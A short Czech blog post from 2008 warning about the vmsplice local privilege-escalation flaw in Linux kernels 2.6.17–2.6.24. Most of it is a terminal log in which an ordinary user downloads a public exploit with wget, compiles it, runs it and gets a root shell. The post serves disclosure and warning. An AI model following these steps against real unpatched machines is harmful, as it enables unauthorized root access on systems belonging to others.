Strašlivý exploit na 2.6.17 - 2.6.24!

29. 2. 2008 21:49 (aktualizováno) Jan Hrach

Na začátek mi dovolte malou ukázku. Jedná se o plně aktualizovaný Debian Etch.

 jenda@yakumo:~$ uname -a
 Linux yakumo 2.6.18-5-486 #1 Mon Dec 24 16:04:42 UTC 2007 i586 GNU/Linux
 jenda@yakumo:~$ id
 uid=1000(jenda) gid=1000(jenda) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
 jenda@yakumo:~$ whoami
 jenda
 jenda@yakumo:~$ wget -nv http://www.securityfocus.com/data/vulnerabilities/exploits/27704.c
 13:13:30 URL:http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c [6264/6264] -> "27704.c" [1]
 jenda@yakumo:~$ gcc 27704.c
 jenda@yakumo:~$ ./a.out
 -----------------------------------
  Linux vmsplice Local Root Exploit
  By qaaz
 -----------------------------------
 [+] mmap: 0x0 .. 0x1000
 [+] page: 0x0
 [+] page: 0x20
 [+] mmap: 0x4000 .. 0x5000
 [+] page: 0x4000
 [+] page: 0x4020
 [+] mmap: 0x1000 .. 0x2000
 [+] page: 0x1000
 [+] mmap: 0xb7da9000 .. 0xb7ddb000
 [+] root
 root@yakumo:~# id
 uid=0(root) gid=0(root) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
 root@yakumo:~# whoami
 root
 root@yakumo:~#

Ano, běžný uživatel opravdu získal roota.

Podle zdroje jsou postižena jádra od 2.6.17 až do nového 2.6.24.
Ke stažení jsou dva exploity.
Vyzkoušeno na Debianu Etchi a Ubuntu 7.04 (s 2.6.20, tam to nešlo).

Já bych jim všechny ty počítače a internety zakázal. Ach jo. A to jsem nedávno adminovi ve škole vykládal (o tom možná někdy příště), že i kdyby uživatel spustil vira, že si maximálně smaže svůj home. Na tom školním stroji je ale naštěstí 2.4.

Odkazy:

Dopad chyby bude

Sdílet